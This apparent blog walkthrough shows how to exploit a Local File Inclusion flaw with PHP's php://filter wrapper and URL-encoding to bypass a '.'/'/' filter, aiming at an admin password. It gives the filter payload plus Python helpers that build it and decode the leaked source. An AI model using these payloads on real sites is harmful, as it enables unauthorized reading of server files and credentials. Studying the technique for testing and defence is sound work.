Exploiting Local File Inclusion (LFI) Using PHP Wrapper
--
In my previous blog post on LFI, I covered the basic steps to achieve it. In this post I explain how to achieve LFI when there is input filtering on the server side.
Aim: find the password of the website's admin account.
There are three tabs in the web application.
· Home
· CV
· Contact
When we click the Home tab, the value home travels in the URL as the page parameter. The same happens with the other two tabs.
After checking the basic functionality of the application, we try to bypass it with the basic LFI technique: I replaced the page parameter value with a “../” traversal sequence, and the application detected the attack, showing “Attack detected” on the page.
This indicates that the server is detecting the ../ notation and rejecting our requests, so we have to try wrappers. Let's start with the PHP filter wrapper (php://filter) to bypass the LFI protection.
page=php://filter/convert.base64-encode/resource=index
This payload makes PHP read the file through the convert.base64-encode filter, so its source is base64-encoded before it is included or rendered in the response instead of being executed as PHP. Now we replace the page parameter value with the payload above and check the output.
So the full URL of the application becomes:
When we intercept the above request using Burp, the intercepted request and response look like this:
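As an added example (mine, not code from the original post): a small Python helper that builds the php://filter payload for any resource name and recovers the PHP source from the base64 blob a successful include leaves in the response. The PHP source and the HTML around the blob are constructed sample input standing in for the target's real files, which the post does not show; whether the application appends ".php" to the resource itself is an assumption about the target.

```python
import base64
import re
from typing import Optional


def build_filter_payload(resource: str) -> str:
    """Build the php://filter payload for a given resource name.

    The resource is passed exactly as the post does ("index"); whether the
    application appends ".php" itself is an assumption about the target.
    """
    return f"php://filter/convert.base64-encode/resource={resource}"


def extract_source(response_body: str) -> Optional[str]:
    """Recover PHP source from a response produced by the filter payload.

    convert.base64-encode emits one unbroken run of [A-Za-z0-9+/] with
    optional '=' padding; pick the longest such run in the body and decode
    it. Returns None when nothing decodable is present (e.g. the request
    was blocked and only an error page came back).
    """
    candidates = re.findall(r"[A-Za-z0-9+/]{16,}={0,2}", response_body)
    if not candidates:
        return None
    blob = max(candidates, key=len)
    try:
        return base64.b64decode(blob, validate=True).decode("utf-8")
    except (ValueError, UnicodeDecodeError):
        return None


# Constructed sample: a minimal include driven by ?page=, standing in for the
# target's real index.php (which the post does not show).
SAMPLE_SOURCE = (
    "<?php\n"
    "$page = $_GET['page'];\n"
    "include($page . '.php');\n"
)

# Constructed response: what the page would carry if the wrapper worked, the
# base64 blob wrapped in the rest of the template.
SAMPLE_RESPONSE = (
    "<html><body><div id=\"menu\">Home | CV | Contact</div>\n"
    + base64.b64encode(SAMPLE_SOURCE.encode()).decode()
    + "\n</body></html>\n"
)

# Constructed response for the blocked case: no blob, so nothing to decode.
BLOCKED_RESPONSE = "<html><body>Attack detected</body></html>\n"


if __name__ == "__main__":
    print(build_filter_payload("index"))
    print(extract_source(SAMPLE_RESPONSE))
```

The longest-run heuristic is deliberate: the filter output is the only long base64 run in a normal HTML page, and a blocked request returns no run at all, so extract_source returning None is the quickest way to tell in a script that the filter fired.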
Request:
Response:
From the response it is clear that the server is also able to detect our wrapper payload.
It seems that the application is detecting “.” and “/” in the page parameter and showing an error if it finds them.
Let's try URL-encoding the parameter.
For URL encoding I used an online URL encoder (there are many available).
After encoding once, the payload looks like this (note that the encoder leaves “.” and “-” untouched, since they are unreserved characters, and only percent-encodes “:”, “/” and “=”):
php%3A%2F%2Ffilter%2Fconvert.base64-encode%2Fresource%3Dindex.php
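As an added example (mine, not part of the original post): the Python below reproduces the single encoding step above with urllib's quote, then shows what the application sees after the web server's own decode for raw, single-encoded and double-encoded variants, checked against a constructed blacklist that rejects “.” and “/” (the check the post infers from the error page). It also goes one step beyond the post by encoding every byte, since a default encoder leaves “.” alone. Whether the target application decodes the parameter a second time is not established by the post; the example only shows which encoding layers survive the first decode.

```python
from urllib.parse import quote, unquote

# The payload from the post; the single-encoded form must match the string
# the post shows after one pass through an online URL encoder.
PAYLOAD = "php://filter/convert.base64-encode/resource=index.php"


def percent_encode(value: str, every_char: bool = False) -> str:
    """Percent-encode one layer.

    Default mode mirrors a typical online encoder: reserved characters such
    as ':', '/' and '=' become %XX, while unreserved ones ('.', '-', '_',
    '~', letters, digits) are left alone. every_char=True encodes every
    byte, which is what you need if the blacklist also keys on '.'.
    """
    if every_char:
        return "".join(f"%{b:02X}" for b in value.encode())
    return quote(value, safe="")


def decode_layers(sent: str, layers: int) -> str:
    """Undo `layers` rounds of percent-encoding, as the server stack would.

    One round is done by the web server/PHP when parsing the query string;
    any further round only happens if the application decodes again.
    """
    for _ in range(layers):
        sent = unquote(sent)
    return sent


def is_blocked(page_value: str) -> bool:
    """Constructed stand-in for the check the post infers from the
    'Attack detected' response: reject if '.' or '/' is present."""
    return "." in page_value or "/" in page_value


def analyse(payload: str) -> dict:
    """For each encoding strategy, report what reaches the application
    after the server's single decode and whether the blacklist fires."""
    variants = {
        "raw": payload,
        "single": percent_encode(payload),
        "double": percent_encode(percent_encode(payload)),
        "double_every_char": percent_encode(percent_encode(payload, every_char=True)),
    }
    report = {}
    for name, sent in variants.items():
        seen = decode_layers(sent, 1)
        report[name] = {"sent": sent, "seen": seen, "blocked": is_blocked(seen)}
    return report


if __name__ == "__main__":
    for name, r in analyse(PAYLOAD).items():
        print(f"{name:18} blocked={r['blocked']!s:5} seen={r['seen']}")
```

The "double" row is the practical caveat: because a default encoder never touches “.”, double-encoding it still delivers a string containing “.” to a filter that decodes once, so a blacklist on “.” would still fire; only the every-byte variant hides both characters behind the first decode.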